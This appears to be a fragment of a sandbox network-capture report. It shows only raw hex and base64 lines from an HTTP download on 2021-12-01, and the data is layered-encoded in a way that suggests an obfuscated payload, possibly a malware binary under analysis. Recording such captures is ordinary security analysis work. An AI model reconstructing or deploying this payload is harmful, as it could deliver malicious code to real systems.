                                                                                                                                                                                Data Ascii: JBd29BQUFFQUFDVUJFVFlCQXdvQUFBRVRNQU1BUWdBQUFBQUFBQUFFYnlNQUFBcHZKQUFBQ2g4YUtGSUFBQXB5eHdJQWNDZ3JBQUFLZmg0QUFBcHZId0FBQ2g4Y0tGSU
                                                                                                                                                                                2021-12-01 09:04:36 UTC86INData Raw: 00 47 00 4e 00 42 00 51 00 55 00 46 00 77 00 65 00 6b 00 39 00 42 00 51 00 55 00 46 00 44 00 61 00 45 00 31 00 47 00 53 00 33 00 70 00 46 00 53 00 6b 00 68 00 34 00 51 00 30 00 35 00 58 00 5a 00 30 00 46 00 42 00 51 00 56 00 4e 00 59 00 55 00 54 00 56 00 6e 00 51 00 55 00 46 00 43 00 51 00 32 00 63 00 7a 00 51 00 55 00 46 00 42 00 53 00 32 00 4e 00 36 00 5a 00 30 00 46 00 42 00 51 00 58 00 42 00 32 00 53 00 6c 00 46 00 42 00 51 00 55 00 4e 00 70 00 4d 00 45 00 70 00 46 00 55 00 56 00 46 00 76 00 4e 00 31 00 46 00 42 00 51 00 55 00 4a 00 70 00 63 00 30 00 68 00 46 00 55 00 56 00 46 00 76 00 4e 00 30 00 46 00 42 00 51 00 55 00 4a 00 6f 00 54 00 55 00 5a 00 46 00 55 00 56 00 56 00 76 00 53 00 6d 00 64 00 42 00 51 00 55 00 4e 00 71 00 62 00 30 00 46 00 42 00
                                                                                                                                                                                Data Ascii: GNBQUFwek9BQUFDaE1GS3pFSkh4Q05XZ0FBQVNYUTVnQUFCQ2czQUFBS2N6Z0FBQXB2SlFBQUNpMEpFUVFvN1FBQUJpc0hFUVFvN0FBQUJoTUZFUVVvSmdBQUNqb0FB
                                                                                                                                                                                2021-12-01 09:04:36 UTC90INData Raw: 76 00 54 00 6e 00 64 00 42 00 51 00 55 00 4e 00 75 00 54 00 54 00 52 00 42 00 51 00 55 00 46 00 4c 00 53 00 30 00 4e 00 7a 00 51 00 55 00 46 00 42 00 62 00 31 00 52 00 44 00 51 00 56 00 70 00 36 00 4f 00 58 00 64 00 42 00 51 00 55 00 4a 00 6f 00 54 00 55 00 56 00 46 00 55 00 56 00 46 00 54 00 51 00 56 00 4e 00 71 00 63 00 55 00 46 00 42 00 51 00 55 00 74 00 69 00 4c 00 30 00 46 00 42 00 51 00 55 00 46 00 5a 00 55 00 6b 00 4a 00 43 00 5a 00 55 00 35 00 58 00 5a 00 30 00 46 00 42 00 51 00 56 00 4e 00 56 00 56 00 30 00 68 00 35 00 63 00 57 00 52 00 6a 00 65 00 6d 00 64 00 42 00 51 00 55 00 46 00 77 00 64 00 6a 00 6c 00 42 00 51 00 55 00 46 00 43 00 61 00 45 00 56 00 46 00 52 00 56 00 46 00 6f 00 64 00 6a 00 68 00 6e 00 51 00 55 00 46 00 43 00 61 00 45 00 56
                                                                                                                                                                                Data Ascii: vTndBQUNuTTRBQUFLS0NzQUFBb1RDQVp6OXdBQUJoTUVFUVFTQVNqcUFBQUtiL0FBQUFZUkJCZU5XZ0FBQVNVV0h5cWRjemdBQUFwdjlBQUFCaEVFRVFodjhnQUFCaEV
                                                                                                                                                                                2021-12-01 09:04:36 UTC94INData Raw: 00 6c 00 76 00 59 00 57 00 5a 00 6f 00 4e 00 45 00 46 00 42 00 51 00 57 00 39 00 78 00 51 00 55 00 4a 00 7a 00 64 00 30 00 4a 00 33 00 51 00 30 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 58 00 64 00 42 00 51 00 55 00 56 00 59 00 55 00 47 00 56 00 42 00 51 00 55 00 46 00 4c 00 51 00 32 00 64 00 61 00 65 00 6a 00 6c 00 33 00 51 00 55 00 46 00 43 00 61 00 56 00 5a 00 35 00 52 00 58 00 64 00 7a 00 51 00 57 00 4e 00 44 00 61 00 47 00 70 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 56 00 6e 00 54 00 45 00 46 00 49 00 51 00 69 00 74 00 49 00 5a 00 30 00 46 00 42 00 51 00 32 00 30 00 34 00 5a 00 6b 00 46 00 42 00 51 00 55 00 74 00 6a 00 61 00 44 00 52 00 4e 00 51 00 55 00 68 00 43 00 65 00 56 00 52 00 6e 00 64 00 30 00 46 00 6a 00 53 00 44 00 52 00 6c 00 51 00
                                                                                                                                                                                Data Ascii: lvYWZoNEFBQW9xQUJzd0J3Q0FBQUFBTXdBQUVYUGVBQUFLQ2daejl3QUFCaVZ5RXdzQWNDaGpBQUFLY3VnTEFIQitIZ0FBQ204ZkFBQUtjaDRNQUhCeVRnd0FjSDRlQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC97INData Raw: 59 00 57 00 78 00 72 00 57 00 57 00 46 00 73 00 63 00 33 00 4a 00 49 00 51 00 6b 00 56 00 50 00 52 00 56 00 45 00 72 00 56 00 30 00 68 00 33 00 65 00 48 00 46 00 58 00 55 00 6d 00 68 00 78 00 56 00 33 00 6c 00 7a 00 54 00 30 00 46 00 75 00 63 00 30 00 39 00 42 00 51 00 55 00 46 00 46 00 52 00 56 00 45 00 30 00 55 00 6b 00 51 00 31 00 59 00 6c 00 56 00 72 00 56 00 7a 00 5a 00 6d 00 52 00 56 00 45 00 34 00 57 00 46 00 64 00 43 00 54 00 56 00 42 00 46 00 55 00 54 00 68 00 68 00 54 00 56 00 70 00 46 00 51 00 32 00 56 00 33 00 4f 00 45 00 46 00 42 00 51 00 56 00 46 00 59 00 59 00 57 00 6b 00 30 00 54 00 6b 00 46 00 75 00 63 00 31 00 42 00 42 00 51 00 55 00 46 00 46 00 52 00 30 00 64 00 77 00 51 00 54 00 4a 00 33 00 51 00 55 00 46 00 42 00 51 00 55 00 6f 00 33
                                                                                                                                                                                Data Ascii: YWxrWWFsc3JIQkVPRVErV0h3eHFXUmhxV3lzT0Fuc09BQUFFRVE0UkQ1YlVrVzZmRVE4WFdCTVBFUThhTVpFQ2V3OEFBQVFYYWk0TkFuc1BBQUFFR0dwQTJ3QUFBQUo3
                                                                                                                                                                                2021-12-01 09:04:36 UTC101INData Raw: 00 73 00 57 00 6c 00 64 00 43 00 5a 00 48 00 46 00 58 00 52 00 32 00 74 00 53 00 51 00 6c 00 4e 00 70 00 4d 00 55 00 46 00 42 00 51 00 55 00 64 00 4b 00 5a 00 32 00 74 00 53 00 51 00 6c 00 64 00 76 00 53 00 6c 00 64 00 53 00 5a 00 48 00 46 00 58 00 52 00 6d 00 64 00 55 00 51 00 6d 00 64 00 4a 00 55 00 6b 00 4a 00 74 00 61 00 32 00 39 00 30 00 51 00 55 00 46 00 42 00 51 00 6d 00 68 00 4e 00 53 00 45 00 56 00 52 00 59 00 31 00 52 00 44 00 51 00 55 00 6c 00 53 00 51 00 6d 00 31 00 72 00 55 00 6b 00 4a 00 35 00 61 00 54 00 46 00 42 00 51 00 55 00 46 00 48 00 52 00 58 00 64 00 72 00 56 00 55 00 56 00 33 00 62 00 31 00 4a 00 43 00 61 00 45 00 56 00 49 00 59 00 57 00 78 00 72 00 57 00 47 00 46 00 73 00 5a 00 31 00 52 00 44 00 65 00 46 00 6c 00 55 00 52 00 45 00
                                                                                                                                                                                Data Ascii: sWldCZHFXR2tSQlNpMUFBQUdKZ2tSQldvSldSZHFXRmdUQmdJUkJta290QUFBQmhNSEVRY1RDQUlSQm1rUkJ5aTFBQUFHRXdrVUV3b1JCaEVIYWxrWGFsZ1RDeFlURE
                                                                                                                                                                                2021-12-01 09:04:36 UTC105INData Raw: 55 00 35 00 55 00 56 00 55 00 46 00 43 00 5a 00 32 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 55 00 46 00 75 00 63 00 31 00 56 00 42 00 51 00 55 00 46 00 46 00 61 00 6d 00 31 00 72 00 63 00 55 00 46 00 42 00 51 00 57 00 4a 00 4e 00 51 00 55 00 31 00 42 00 56 00 6b 00 46 00 42 00 51 00 55 00 46 00 45 00 61 00 30 00 46 00 42 00 51 00 6b 00 56 00 45 00 51 00 57 00 35 00 7a 00 55 00 55 00 46 00 42 00 51 00 55 00 56 00 71 00 62 00 57 00 74 00 34 00 51 00 6b 00 4a 00 5a 00 53 00 7a 00 4e 00 72 00 54 00 55 00 52 00 44 00 65 00 58 00 4e 00 31 00 51 00 6e 00 64 00 4b 00 4e 00 30 00 56 00 42 00 51 00 55 00 46 00 43 00 53 00 54 00 56 00 77 00 52 00 6a 00 46 00 72 00 65 00 45 00 4a 00 43 00 57 00 55 00 73 00 7a 00 61 00 54 00 52 00 44 00 5a 00 58 00 68 00 42 00 51
                                                                                                                                                                                Data Ascii: U5UVUFCZ29BQUFFbUFuc1VBQUFFam1rcUFBQWJNQU1BVkFBQUFEa0FBQkVEQW5zUUFBQUVqbWt4QkJZSzNrTURDeXN1QndKN0VBQUFCSTVwRjFreEJCWUszaTRDZXhBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC110INData Raw: 00 4b 00 79 00 39 00 42 00 51 00 55 00 46 00 48 00 54 00 45 00 46 00 33 00 52 00 30 00 4e 00 48 00 4b 00 33 00 46 00 42 00 55 00 55 00 46 00 48 00 59 00 6e 00 68 00 4e 00 51 00 6b 00 46 00 42 00 63 00 48 00 70 00 32 00 55 00 55 00 46 00 42 00 51 00 6d 00 68 00 4e 00 52 00 6b 00 56 00 52 00 56 00 55 00 6c 00 69 00 4e 00 6a 00 52 00 43 00 51 00 55 00 46 00 61 00 64 00 6e 00 56 00 33 00 51 00 55 00 46 00 43 00 61 00 58 00 64 00 58 00 52 00 56 00 46 00 56 00 53 00 57 00 49 00 33 00 64 00 30 00 46 00 42 00 51 00 56 00 6c 00 7a 00 52 00 45 00 46 00 5a 00 53 00 57 00 49 00 32 00 62 00 30 00 4a 00 42 00 51 00 56 00 70 00 32 00 52 00 58 00 64 00 46 00 51 00 55 00 4e 00 75 00 55 00 45 00 5a 00 42 00 51 00 55 00 46 00 48 00 52 00 58 00 64 00 5a 00 55 00 6b 00 4a 00
                                                                                                                                                                                Data Ascii: Ky9BQUFHTEF3R0NHK3FBUUFHYnhNQkFBcHp2UUFBQmhNRkVRVUliNjRCQUFadnV3QUFCaXdXRVFVSWI3d0FBQVlzREFZSWI2b0JBQVp2RXdFQUNuUEZBQUFHRXdZUkJ
                                                                                                                                                                                2021-12-01 09:04:36 UTC114INData Raw: 4e 00 43 00 62 00 47 00 39 00 4d 00 59 00 56 00 46 00 6b 00 63 00 47 00 4e 00 36 00 59 00 30 00 4a 00 42 00 51 00 58 00 46 00 4e 00 62 00 6e 00 64 00 42 00 51 00 55 00 46 00 52 00 4d 00 32 00 56 00 48 00 65 00 56 00 6c 00 76 00 54 00 58 00 64 00 46 00 51 00 55 00 4e 00 74 00 4f 00 44 00 42 00 42 00 55 00 55 00 46 00 4c 00 52 00 45 00 4a 00 4a 00 51 00 30 00 74 00 45 00 5a 00 30 00 4a 00 42 00 51 00 58 00 46 00 4e 00 62 00 6e 00 64 00 42 00 51 00 55 00 46 00 52 00 4d 00 32 00 56 00 42 00 51 00 57 00 74 00 78 00 51 00 55 00 46 00 46 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 55 00 57 00 74 00 4a 00 51 00 55 00 64 00 33 00 62 00 30 00 46 00 42 00 51 00 55 00 56 00 69 00 54 00 55 00 46 00 33 00 51 00 58 00 52 00 6e 00 52 00 55
                                                                                                                                                                                Data Ascii: NCbG9MYVFkcGN6Y0JBQXFNbndBQUFRM2VHeVlvTXdFQUNtODBBUUFLREJJQ0tEZ0JBQXFNbndBQUFRM2VBQWtxQUFFUUFBQUFBQUFBUWtJQUd3b0FBQUViTUF3QXRnRU
                                                                                                                                                                                2021-12-01 09:04:36 UTC118INData Raw: 00 54 00 68 00 42 00 51 00 55 00 46 00 47 00 64 00 55 00 46 00 30 00 51 00 58 00 6c 00 42 00 51 00 55 00 46 00 69 00 53 00 30 00 78 00 76 00 51 00 55 00 46 00 42 00 62 00 32 00 39 00 59 00 51 00 55 00 56 00 42 00 51 00 32 00 35 00 56 00 65 00 55 00 46 00 42 00 51 00 57 00 4a 00 77 00 56 00 45 00 6c 00 42 00 51 00 55 00 4a 00 7a 00 63 00 55 00 56 00 36 00 51 00 55 00 68 00 42 00 54 00 6e 00 4e 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 6a 00 4d 00 54 00 42 00 43 00 51 00 55 00 46 00 76 00 62 00 45 00 6c 00 51 00 4c 00 79 00 38 00 76 00 4d 00 7a 00 6c 00 78 00 59 00 6a 00 45 00 30 00 51 00 6b 00 46 00 42 00 62 00 32 00 78 00 4a 00 55 00 43 00 38 00 76 00 4c 00 7a 00 4d 00 35 00 63 00 57 00 49 00 78 00 4f 00 45 00 4a 00 42 00
                                                                                                                                                                                Data Ascii: ThBQUFGdUF0QXlBQUFiS0xvQUFBb29YQUVBQ25VeUFBQWJwVElBQUJzcUV6QUhBTnNBQUFBQUFBQUFjMTBCQUFvbElQLy8vMzlxYjE0QkFBb2xJUC8vLzM5cWIxOEJB
                                                                                                                                                                                2021-12-01 09:04:36 UTC122INData Raw: 42 00 5a 00 6d 00 67 00 30 00 51 00 55 00 46 00 42 00 62 00 33 00 46 00 46 00 55 00 56 00 46 00 78 00 51 00 55 00 46 00 47 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 46 00 6c 00 42 00 52 00 6b 00 56 00 76 00 51 00 55 00 46 00 33 00 62 00 30 00 46 00 42 00 51 00 55 00 56 00 44 00 51 00 55 00 4e 00 6e 00 51 00 55 00 77 00 78 00 59 00 30 00 46 00 44 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 46 00 44 00 52 00 55 00 46 00 52 00 62 00 55 00 31 00 42 00 51 00 32 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 42 00 51 00 6d 00 39 00 42 00 56 00 6c 00 63 00 34 00 51 00 55 00 4e 00 6e 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 55 00 7a 00 63 00 30 00 46 00 42 00 64 00 32 00 39
                                                                                                                                                                                Data Ascii: BZmg0QUFBb3FFUVFxQUFGQUFBQUFBRFlBRkVvQUF3b0FBQUVDQUNnQUwxY0FDZ0FBQUFBQ0FDRUFRbU1BQ2dBQUFBQUNBQm9BVlc4QUNnQUFBQUFBQUFBQWUzc0FBd29
                                                                                                                                                                                2021-12-01 09:04:36 UTC126INData Raw: 00 52 00 36 00 5a 00 55 00 52 00 43 00 52 00 55 00 74 00 4d 00 51 00 57 00 4e 00 53 00 51 00 32 00 30 00 34 00 54 00 45 00 46 00 42 00 51 00 55 00 73 00 7a 00 54 00 6a 00 52 00 4e 00 52 00 56 00 46 00 72 00 63 00 30 00 4a 00 34 00 52 00 55 00 70 00 69 00 64 00 33 00 4e 00 42 00 51 00 55 00 46 00 79 00 59 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 46 00 4a 00 52 00 6a 00 46 00 6e 00 54 00 55 00 4e 00 42 00 5a 00 55 00 39 00 68 00 56 00 44 00 68 00 46 00 4c 00 79 00 38 00 76 00 4c 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00 64 00 42 00 51 00 55 00 46 00 46 00 52 00 55 00 31 00 42 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 39 00 33 00 51 00 55 00 46 00 42 00 52 00 6c 00 6c 00 42 00 51 00
                                                                                                                                                                                Data Ascii: R6ZURCRUtMQWNSQ204TEFBQUszTjRNRVFrc0J4RUpid3NBQUFyYzNnTW0zZ0FJRjFnTUNBZU9hVDhFLy8vLzNnTW0zZ0FHS2dBQUFFRU1BUUFBQUFBQW93QUFBRllBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC129INData Raw: 53 00 30 00 6c 00 5a 00 51 00 6b 00 46 00 42 00 63 00 48 00 59 00 77 00 64 00 30 00 46 00 42 00 51 00 33 00 51 00 30 00 54 00 55 00 56 00 52 00 57 00 58 00 4e 00 43 00 65 00 45 00 56 00 48 00 59 00 6e 00 64 00 7a 00 51 00 55 00 46 00 42 00 63 00 6d 00 4d 00 7a 00 5a 00 30 00 31 00 74 00 4d 00 32 00 64 00 42 00 55 00 6b 00 4a 00 43 00 5a 00 46 00 6c 00 46 00 64 00 31 00 46 00 53 00 51 00 6b 00 46 00 74 00 54 00 32 00 46 00 55 00 4f 00 46 00 67 00 76 00 4c 00 79 00 38 00 76 00 4d 00 32 00 64 00 76 00 53 00 55 00 78 00 42 00 57 00 55 00 6c 00 69 00 64 00 33 00 4e 00 42 00 51 00 55 00 46 00 79 00 59 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 46 00 48 00 5a 00 6d 00 67 00 77 00 51 00 6b 00 46 00 42 00 55 00 57 00 78 00 4d 00 55 00 6d 00 4e 00 74
                                                                                                                                                                                Data Ascii: S0lZQkFBcHYwd0FBQ3Q0TUVRWXNCeEVHYndzQUFBcmMzZ01tM2dBUkJCZFlFd1FSQkFtT2FUOFgvLy8vM2dvSUxBWUlid3NBQUFyYzNnTW0zZ0FHZmgwQkFBUWxMUmNt
                                                                                                                                                                                2021-12-01 09:04:36 UTC133INData Raw: 00 46 00 54 00 55 00 4a 00 5a 00 4e 00 58 00 42 00 4e 00 63 00 31 00 6c 00 53 00 51 00 33 00 68 00 6b 00 57 00 55 00 56 00 33 00 63 00 31 00 4a 00 44 00 65 00 45 00 56 00 48 00 61 00 6d 00 31 00 72 00 65 00 58 00 4a 00 34 00 52 00 55 00 70 00 69 00 65 00 56 00 46 00 42 00 51 00 55 00 46 00 76 00 52 00 45 00 4a 00 43 00 5a 00 46 00 6c 00 43 00 55 00 32 00 70 00 78 00 51 00 55 00 46 00 42 00 52 00 32 00 4a 00 35 00 51 00 55 00 46 00 42 00 51 00 57 00 39 00 55 00 51 00 6e 00 6c 00 7a 00 59 00 6b 00 56 00 6e 00 59 00 32 00 39 00 4a 00 55 00 55 00 46 00 42 00 51 00 32 00 68 00 4e 00 54 00 30 00 4a 00 34 00 52 00 55 00 39 00 69 00 4f 00 56 00 6c 00 42 00 51 00 55 00 46 00 76 00 64 00 45 00 4e 00 42 00 59 00 31 00 4a 00 45 00 62 00 53 00 39 00 55 00 51 00 55 00
                                                                                                                                                                                Data Ascii: FTUJZNXBNc1lSQ3hkWUV3c1JDeEVHam1reXJ4RUpieVFBQUFvREJCZFlCU2pxQUFBR2J5QUFBQW9UQnlzYkVnY29JUUFBQ2hNT0J4RU9iOVlBQUFvdENBY1JEbS9UQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC137INData Raw: 55 00 74 00 70 00 53 00 55 00 4e 00 42 00 4d 00 7a 00 41 00 33 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 6f 00 4e 00 45 00 4e 00 6c 00 65 00 6e 00 64 00 42 00 51 00 55 00 46 00 52 00 63 00 55 00 6c 00 6e 00 53 00 55 00 52 00 6d 00 56 00 48 00 64 00 42 00 51 00 55 00 46 00 52 00 63 00 55 00 68 00 6e 00 53 00 57 00 39 00 5a 00 5a 00 30 00 46 00 42 00 51 00 32 00 6c 00 76 00 5a 00 55 00 46 00 75 00 63 00 7a 00 6c 00 42 00 51 00 55 00 46 00 46 00 53 00 32 00 6c 00 4a 00 51 00 30 00 45 00 7a 00 4d 00 44 00 6c 00 42 00 51 00 55 00 46 00 46 00 53 00 32 00 67 00 30 00 51 00 32 00 56 00 36 00 4e 00 45 00 46 00 42 00 51 00 56 00 46 00 78 00 53 00 57 00 64 00 4a 00 52 00 47 00 5a 00 55 00 4e 00 45 00 46 00 42 00 51 00 56 00 46 00 78 00 53 00 47 00 64 00 4b 00 4e
                                                                                                                                                                                Data Ascii: UtpSUNBMzA3QUFBRUtoNENlendBQUFRcUlnSURmVHdBQUFRcUhnSW9ZZ0FBQ2lvZUFuczlBQUFFS2lJQ0EzMDlBQUFFS2g0Q2V6NEFBQVFxSWdJRGZUNEFBQVFxSGdKN
                                                                                                                                                                                2021-12-01 09:04:36 UTC142INData Raw: 00 4d 00 53 00 74 00 42 00 51 00 55 00 46 00 46 00 53 00 32 00 67 00 30 00 51 00 30 00 74 00 48 00 53 00 55 00 46 00 42 00 51 00 57 00 39 00 78 00 53 00 47 00 64 00 4b 00 4e 00 32 00 5a 00 33 00 51 00 55 00 46 00 43 00 51 00 32 00 39 00 70 00 51 00 57 00 64 00 4f 00 4f 00 57 00 5a 00 33 00 51 00 55 00 46 00 43 00 51 00 32 00 39 00 6c 00 51 00 57 00 35 00 31 00 51 00 55 00 46 00 42 00 51 00 55 00 56 00 4c 00 61 00 55 00 6c 00 44 00 51 00 54 00 4d 00 79 00 51 00 55 00 46 00 42 00 51 00 55 00 56 00 4c 00 61 00 44 00 52 00 44 00 5a 00 54 00 52 00 46 00 51 00 55 00 46 00 42 00 55 00 58 00 46 00 4a 00 5a 00 30 00 6c 00 45 00 5a 00 6c 00 6c 00 46 00 51 00 55 00 46 00 42 00 55 00 58 00 46 00 49 00 5a 00 30 00 6c 00 76 00 57 00 57 00 64 00 42 00 51 00 55 00 4e 00
                                                                                                                                                                                Data Ascii: MStBQUFFS2g0Q0tHSUFBQW9xSGdKN2Z3QUFCQ29pQWdOOWZ3QUFCQ29lQW51QUFBQUVLaUlDQTMyQUFBQUVLaDRDZTRFQUFBUXFJZ0lEZllFQUFBUXFIZ0lvWWdBQUN
                                                                                                                                                                                2021-12-01 09:04:36 UTC146INData Raw: 4a 00 43 00 53 00 46 00 56 00 58 00 51 00 55 00 46 00 42 00 51 00 6b 00 56 00 33 00 59 00 31 00 4a 00 43 00 65 00 58 00 64 00 49 00 52 00 56 00 46 00 6b 00 64 00 6b 00 4e 00 33 00 51 00 55 00 46 00 44 00 64 00 48 00 70 00 6c 00 51 00 58 00 6c 00 69 00 5a 00 55 00 46 00 43 00 53 00 55 00 4e 00 4c 00 53 00 31 00 46 00 43 00 51 00 55 00 46 00 76 00 4e 00 6c 00 4e 00 32 00 4c 00 79 00 38 00 76 00 4f 00 54 00 52 00 50 00 52 00 57 00 64 00 4d 00 4b 00 30 00 5a 00 72 00 55 00 55 00 46 00 42 00 51 00 6e 00 52 00 32 00 51 00 33 00 64 00 42 00 51 00 55 00 4e 00 30 00 64 00 30 00 4e 00 6a 00 4e 00 54 00 52 00 43 00 51 00 55 00 46 00 5a 00 56 00 45 00 4e 00 43 00 52 00 55 00 6c 00 4c 00 53 00 48 00 4e 00 42 00 51 00 55 00 46 00 76 00 53 00 47 00 49 00 30 00 57 00 55
                                                                                                                                                                                Data Ascii: JCSFVXQUFBQkV3Y1JCeXdIRVFkdkN3QUFDdHplQXliZUFCSUNLS1FCQUFvNlN2Ly8vOTRPRWdMK0ZrUUFBQnR2Q3dBQUN0d0NjNTRCQUFZVENCRUlLSHNBQUFvSGI0WU
                                                                                                                                                                                2021-12-01 09:04:36 UTC150INData Raw: 00 57 00 63 00 7a 00 52 00 32 00 64 00 43 00 56 00 6b 00 78 00 47 00 5a 00 7a 00 4e 00 48 00 5a 00 30 00 46 00 74 00 54 00 7a 00 6c 00 57 00 52 00 45 00 4a 00 6e 00 51 00 30 00 70 00 4c 00 65 00 48 00 64 00 61 00 51 00 6d 00 64 00 45 00 4e 00 55 00 31 00 43 00 64 00 31 00 70 00 43 00 5a 00 30 00 52 00 61 00 51 00 54 00 6c 00 6e 00 63 00 6b 00 4a 00 6e 00 51 00 56 00 4a 00 4e 00 54 00 56 00 56 00 30 00 53 00 47 00 64 00 42 00 65 00 45 00 30 00 30 00 52 00 58 00 52 00 44 00 5a 00 30 00 4e 00 34 00 53 00 6b 00 4e 00 56 00 4d 00 55 00 6c 00 6e 00 51 00 58 00 4e 00 4a 00 53 00 56 00 6c 00 76 00 53 00 57 00 64 00 42 00 4d 00 30 00 31 00 4a 00 57 00 57 00 39 00 4a 00 5a 00 30 00 4e 00 51 00 54 00 6b 00 6c 00 5a 00 62 00 30 00 6c 00 6e 00 51 00 6d 00 68 00 49 00
                                                                                                                                                                                Data Ascii: WczR2dCVkxGZzNHZ0FtTzlWREJnQ0pLeHdaQmdENU1Cd1pCZ0RaQTlnckJnQVJNTVV0SGdBeE00RXRDZ0N4SkNVMUlnQXNJSVlvSWdBM01JWW9JZ0NQTklZb0lnQmhI
                                                                                                                                                                                2021-12-01 09:04:36 UTC154INData Raw: 42 00 51 00 56 00 46 00 42 00 55 00 55 00 46 00 4c 00 55 00 56 00 6c 00 42 00 51 00 55 00 4e 00 7a 00 51 00 55 00 45 00 30 00 51 00 58 00 42 00 52 00 51 00 55 00 4a 00 42 00 51 00 6b 00 46 00 42 00 64 00 48 00 68 00 6e 00 51 00 55 00 46 00 4c 00 64 00 30 00 46 00 45 00 5a 00 30 00 4e 00 76 00 51 00 55 00 46 00 46 00 51 00 55 00 56 00 42 00 51 00 6e 00 46 00 4e 00 5a 00 30 00 46 00 42 00 53 00 31 00 46 00 42 00 54 00 30 00 46 00 4c 00 63 00 30 00 46 00 42 00 55 00 55 00 46 00 52 00 51 00 55 00 64 00 4e 00 61 00 6b 00 46 00 42 00 51 00 58 00 42 00 42 00 51 00 6c 00 56 00 42 00 64 00 55 00 46 00 42 00 51 00 6b 00 46 00 43 00 51 00 55 00 46 00 6b 00 55 00 30 00 31 00 42 00 51 00 55 00 4e 00 72 00 51 00 55 00 5a 00 52 00 51 00 7a 00 64 00 42 00 51 00 55 00 56
                                                                                                                                                                                Data Ascii: BQVFBUUFLUVlBQUNzQUE0QXBRQUJBQkFBdHhnQUFLd0FEZ0NvQUFFQUVBQnFNZ0FBS1FBT0FLc0FBUUFRQUdNakFBQXBBQlVBdUFBQkFCQUFkU01BQUNrQUZRQzdBQUV
                                                                                                                                                                                2021-12-01 09:04:36 UTC158INData Raw: 00 46 00 4a 00 56 00 45 00 46 00 52 00 51 00 55 00 46 00 56 00 5a 00 7a 00 42 00 42 00 51 00 55 00 5a 00 72 00 51 00 6b 00 68 00 33 00 52 00 57 00 39 00 42 00 61 00 45 00 31 00 43 00 51 00 55 00 46 00 43 00 5a 00 45 00 52 00 33 00 51 00 55 00 46 00 58 00 55 00 55 00 56 00 6d 00 51 00 56 00 4e 00 6e 00 51 00 30 00 56 00 33 00 52 00 55 00 46 00 42 00 53 00 30 00 31 00 51 00 51 00 55 00 46 00 43 00 57 00 6b 00 46 00 53 00 4f 00 45 00 4a 00 4c 00 51 00 55 00 6c 00 55 00 51 00 56 00 46 00 42 00 51 00 54 00 42 00 42 00 56 00 55 00 46 00 42 00 52 00 6d 00 74 00 43 00 53 00 48 00 64 00 46 00 62 00 30 00 46 00 6f 00 54 00 55 00 4a 00 42 00 51 00 55 00 52 00 30 00 51 00 6c 00 46 00 42 00 51 00 56 00 64 00 52 00 52 00 57 00 5a 00 42 00 55 00 32 00 64 00 44 00 52 00
                                                                                                                                                                                Data Ascii: FJVEFRQUFVZzBBQUZrQkh3RW9BaE1CQUFCZER3QUFXUUVmQVNnQ0V3RUFBS01QQUFCWkFSOEJLQUlUQVFBQTBBVUFBRmtCSHdFb0FoTUJBQUR0QlFBQVdRRWZBU2dDR
                                                                                                                                                                                2021-12-01 09:04:36 UTC161INData Raw: 52 00 7a 00 52 00 4a 00 55 00 6b 00 46 00 52 00 51 00 7a 00 42 00 48 00 62 00 30 00 6c 00 53 00 51 00 56 00 46 00 45 00 53 00 30 00 64 00 76 00 53 00 56 00 4a 00 42 00 55 00 55 00 51 00 78 00 52 00 32 00 35 00 42 00 55 00 6b 00 46 00 52 00 51 00 57 00 64 00 48 00 4e 00 45 00 6c 00 53 00 51 00 56 00 46 00 43 00 54 00 45 00 63 00 30 00 53 00 56 00 4a 00 42 00 55 00 55 00 49 00 79 00 52 00 7a 00 52 00 4a 00 55 00 6b 00 46 00 52 00 51 00 32 00 68 00 48 00 4e 00 45 00 6c 00 53 00 51 00 56 00 46 00 45 00 5a 00 30 00 64 00 78 00 57 00 55 00 46 00 42 00 55 00 55 00 46 00 4d 00 52 00 7a 00 5a 00 5a 00 51 00 55 00 46 00 52 00 51 00 54 00 4a 00 48 00 4d 00 48 00 4e 00 53 00 51 00 56 00 46 00 45 00 5a 00 30 00 64 00 78 00 57 00 55 00 46 00 42 00 55 00 55 00 46 00 4d
                                                                                                                                                                                Data Ascii: RzRJUkFRQzBHb0lSQVFES0dvSVJBUUQxR25BUkFRQWdHNElSQVFCTEc0SVJBUUIyRzRJUkFRQ2hHNElSQVFEZ0dxWUFBUUFMRzZZQUFRQTJHMHNSQVFEZ0dxWUFBUUFM
                                                                                                                                                                                2021-12-01 09:04:36 UTC165INData Raw: 00 77 00 51 00 54 00 64 00 44 00 4f 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 62 00 47 00 64 00 42 00 59 00 55 00 68 00 56 00 54 00 56 00 52 00 45 00 55 00 55 00 52 00 76 00 54 00 56 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 31 00 4a 00 42 00 52 00 44 00 52 00 78 00 57 00 46 00 4a 00 4e 00 54 00 30 00 46 00 50 00 64 00 33 00 70 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 70 00 5a 00 51 00 57 00 39 00 54 00 51 00 58 00 42 00 42 00 64 00 7a 00 68 00 42 00 5a 00 6b 00 52 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 73 00 5a 00 30 00 52 00 59 00 53 00 55 00 4e 00 72 00 52 00 45 00 56 00 42 00 51 00 55 00 31 00 4f 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 44 00 56 00 30 00 46 00 43 00 4d 00 47 00 52 00 72 00 55 00 6b 00 31 00 53 00 51 00 55 00
